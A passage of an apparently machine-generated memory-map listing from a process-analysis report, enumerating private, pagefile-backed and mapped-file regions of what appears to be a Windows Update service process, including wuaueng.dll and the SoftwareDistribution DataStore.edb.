filename = ""
Region:
id = 5474
start_va = 0xe00000
end_va = 0xe07fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e00000"
filename = ""
Region:
id = 5475
start_va = 0x5260000
end_va = 0x545ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005260000"
filename = ""
Region:
id = 5836
start_va = 0x1f40000
end_va = 0x1fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f40000"
filename = ""
Region:
id = 5837
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 5838
start_va = 0x2280000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 5839
start_va = 0x2370000
end_va = 0x23effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002370000"
filename = ""
Region:
id = 5840
start_va = 0x2980000
end_va = 0x29fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 5841
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 5842
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 5843
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 5844
start_va = 0x15b0000
end_va = 0x162ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000015b0000"
filename = ""
Region:
id = 5845
start_va = 0x2040000
end_va = 0x20bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002040000"
filename = ""
Region:
id = 5846
start_va = 0x2b30000
end_va = 0x2baffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b30000"
filename = ""
Region:
id = 5847
start_va = 0x2d20000
end_va = 0x2d9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d20000"
filename = ""
Region:
id = 5848
start_va = 0x7fef4450000
end_va = 0x7fef46a2fff
monitored = 0
entry_point = 0x7fef445236c
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 5849
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 5850
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 5851
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 5852
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 5853
start_va = 0x7fef47d0000
end_va = 0x7fef4a49fff
monitored = 0
entry_point = 0x7fef4802200
region_type = mapped_file
name = "esent.dll"
filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")
Region:
id = 5854
start_va = 0x7fef7420000
end_va = 0x7fef7490fff
monitored = 0
entry_point = 0x7fef745ecc4
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 5855
start_va = 0x7fefa6a0000
end_va = 0x7fefa710fff
monitored = 0
entry_point = 0x7fefa6a1010
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 5856
start_va = 0x7fefa630000
end_va = 0x7fefa693fff
monitored = 0
entry_point = 0x7fefa631254
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 5857
start_va = 0x7fef57c0000
end_va = 0x7fef57dafff
monitored = 0
entry_point = 0x7fef57c1198
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 5858
start_va = 0x7fef72e0000
end_va = 0x7fef72eefff
monitored = 0
entry_point = 0x7fef72e9a48
region_type = mapped_file
name = "mspatcha.dll"
filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll")
Region:
id = 5859
start_va = 0x34f0000
end_va = 0x35effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000034f0000"
filename = ""
Region:
id = 5860
start_va = 0x77e00000
end_va = 0x77e06fff
monitored = 0
entry_point = 0x77e0106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 5861
start_va = 0x9e0000
end_va = 0x9effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 5862
start_va = 0x9f0000
end_va = 0x9f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5863
start_va = 0xa00000
end_va = 0xa06fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5864
start_va = 0x9f0000
end_va = 0x9f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5865
start_va = 0xa00000
end_va = 0xa06fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5866
start_va = 0x7fefd040000
end_va = 0x7fefd047fff
monitored = 0
entry_point = 0x7fefd042a6c
region_type = mapped_file
name = "wmsgapi.dll"
filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")
Region:
id = 5867
start_va = 0x7fef7280000
end_va = 0x7fef728cfff
monitored = 0
entry_point = 0x7fef7281104
region_type = mapped_file
name = "wups.dll"
filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll")
Region:
id = 5868
start_va = 0x7fef7280000
end_va = 0x7fef728efff
monitored = 0
entry_point = 0x7fef7286fb0
region_type = mapped_file
name = "wups2.dll"
filename = "\\Windows\\System32\\wups2.dll" (normalized: "c:\\windows\\system32\\wups2.dll")
Region:
id = 5869
start_va = 0x38b0000
end_va = 0x396ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 5870
start_va = 0x9f0000
end_va = 0xa09fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009f0000"
filename = ""
Region:
id = 5871
start_va = 0x3970000
end_va = 0x3a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003970000"
filename = ""
Region:
id = 5872
start_va = 0x5460000
end_va = 0x555ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005460000"
filename = ""
Region:
id = 5873
start_va = 0x5560000
end_va = 0x565ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005560000"
filename = ""
Region:
id = 5874
start_va = 0x5660000
end_va = 0x575ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005660000"
filename = ""
Region:
id = 5875
start_va = 0xa10000
end_va = 0xa10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a10000"
filename = ""
Region:
id = 5876
start_va = 0xa90000
end_va = 0xaeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 5877
start_va = 0xa90000
end_va = 0xa9ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a90000"
filename = ""
Region:
id = 5878
start_va = 0xaa0000
end_va = 0xaaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000aa0000"
filename = ""
Region:
id = 5879
start_va = 0xab0000
end_va = 0xabffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ab0000"
filename = ""
Region:
id = 5880
start_va = 0xac0000
end_va = 0xacffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ac0000"
filename = ""
Region:
id = 5881
start_va = 0xad0000
end_va = 0xadffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ad0000"
filename = ""
Region:
id = 5882
start_va = 0xae0000
end_va = 0xaeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ae0000"
filename = ""
Region:
id = 5883
start_va = 0xa20000
end_va = 0xa20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a20000"
filename = ""
Region:
id = 5884
start_va = 0x5860000
end_va = 0x58dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005860000"
filename = ""
Region:
id = 5885
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 5886
start_va = 0x5760000
end_va = 0x585ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005760000"
filename = ""
Region:
id = 5887
start_va = 0x5bf0000
end_va = 0x5ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005bf0000"
filename = ""
Region:
id = 5888
start_va = 0xfb0000
end_va = 0x100ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fb0000"
filename = ""
Region:
id = 5889
start_va = 0xfb0000
end_va = 0xfbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fb0000"
filename = ""
Region:
id = 5890
start_va = 0xfc0000
end_va = 0xfcffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fc0000"
filename = ""
Region:
id = 5891
start_va = 0xfd0000
end_va = 0xfdffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fd0000"
filename = ""
Region:
id = 5892
start_va = 0xfe0000
end_va = 0xfeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fe0000"
filename = ""
Region:
id = 5893
start_va = 0xff0000
end_va = 0xffffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ff0000"
filename = ""
Region:
id = 5894
start_va = 0x1000000
end_va = 0x100ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001000000"
filename = ""
Region:
id = 5895
start_va = 0xa30000
end_va = 0xa37fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a30000"
filename = ""
Region:
id = 5896
start_va = 0x5cf0000
end_va = 0x6ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 5897
start_va = 0xa40000
end_va = 0xa4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a40000"
filename = ""
Region:
id = 5898
start_va = 0xa50000
end_va = 0xa5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a50000"
filename = ""
Region:
id = 5899
start_va = 0xaf0000
end_va = 0xafffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000af0000"
filename = ""
Region:
id = 5900
start_va = 0xb00000
end_va = 0xb00fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b00000"
filename = ""
Region:
id = 5901
start_va = 0xe00000
end_va = 0xe01fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e00000"
filename = ""
Region:
id = 5902
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 5903
start_va = 0x1260000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 5904
start_va = 0x12a0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012a0000"
filename = ""
Region:
id = 5905
start_va = 0xe10000
end_va = 0xe10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e10000"
filename = ""
Region:
id = 5906
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 5907
start_va = 0x1260000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 5908
start_va = 0x12a0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012a0000"
filename = ""
Region:
id = 5909
start_va = 0x6cf0000
end_va = 0x6e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006cf0000"
filename = ""
Region:
id = 5910
start_va = 0x6cf0000
end_va = 0x6e2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006cf0000"
filename = ""
Region:
id = 5911
start_va = 0xe20000
end_va = 0xe20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e20000"
filename = ""
Region:
id = 5912
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 5913
start_va = 0x1260000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 5914
start_va = 0x12a0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012a0000"
filename = ""
Region:
id = 5915
start_va = 0xe20000
end_va = 0xe20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e20000"
filename = ""
Region:
id = 5916
start_va = 0xe30000
end_va = 0xe31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 5917
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 5918
start_va = 0x1260000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 5919
start_va = 0x12a0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012a0000"
filename = ""
Region:
id = 5920
start_va = 0x6cf0000
end_va = 0x6e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006cf0000"
filename = ""
Region:
id = 5921
start_va = 0x6cf0000
end_va = 0x6e2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006cf0000"
filename = ""
Region:
id = 5922
start_va = 0xe30000
end_va = 0xe30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 5923
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 5924
start_va = 0x1260000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 5925
start_va = 0x12a0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012a0000"
filename = ""
Region:
id = 5926
start_va = 0xe20000
end_va = 0xe2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e20000"
filename = ""
Region:
id = 5927
start_va = 0xe30000
end_va = 0xe37fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 5928
start_va = 0x1010000
end_va = 0x101ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001010000"
filename = ""
Region:
id = 5929
start_va = 0x1120000
end_va = 0x112ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001120000"
filename = ""
Region:
id = 5930
start_va = 0x11b0000
end_va = 0x11b7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011b0000"
filename = ""
Region:
id = 5931
start_va = 0x11c0000
end_va = 0x11c7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011c0000"
filename = ""
Region:
id = 5932
start_va = 0x11d0000
end_va = 0x11d7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011d0000"
filename = ""
Region:
id = 5933
start_va = 0x12e0000
end_va = 0x12e1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012e0000"
filename = ""
Region:
id = 5934
start_va = 0x11b0000
end_va = 0x11b7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011b0000"
filename = ""
Region:
id = 5935
start_va = 0x12e0000
end_va = 0x12effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012e0000"
filename = ""
Region:
id = 5936
start_va = 0x12e0000
end_va = 0x12e7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012e0000"
filename = ""
Region:
id = 5937
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5938
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5939
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5940
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5941
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5942
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5943
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5944
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5945
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5946
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5947
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5948
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5949
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5950
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5951
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5952
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5953
start_va = 0x1fc0000
end_va = 0x203ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fc0000"
filename = ""
Region:
id = 5954
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 5955
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5956
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5957
start_va = 0x12e0000
end_va = 0x12effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012e0000"
filename = ""
Region:
id = 5958
start_va = 0x1370000
end_va = 0x137ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001370000"
filename = ""
Region:
id = 5959
start_va = 0x1380000
end_va = 0x138ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001380000"
filename = ""
Region:
id = 5960
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5961
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5962
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5963
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5964
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5965
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5966
start_va = 0x1390000
end_va = 0x1397fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001390000"
filename = ""
Region:
id = 5967
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5968
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5969
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5970
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5971
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5972
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5973
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5974
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5975
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5976
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5977
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5978
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5979
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
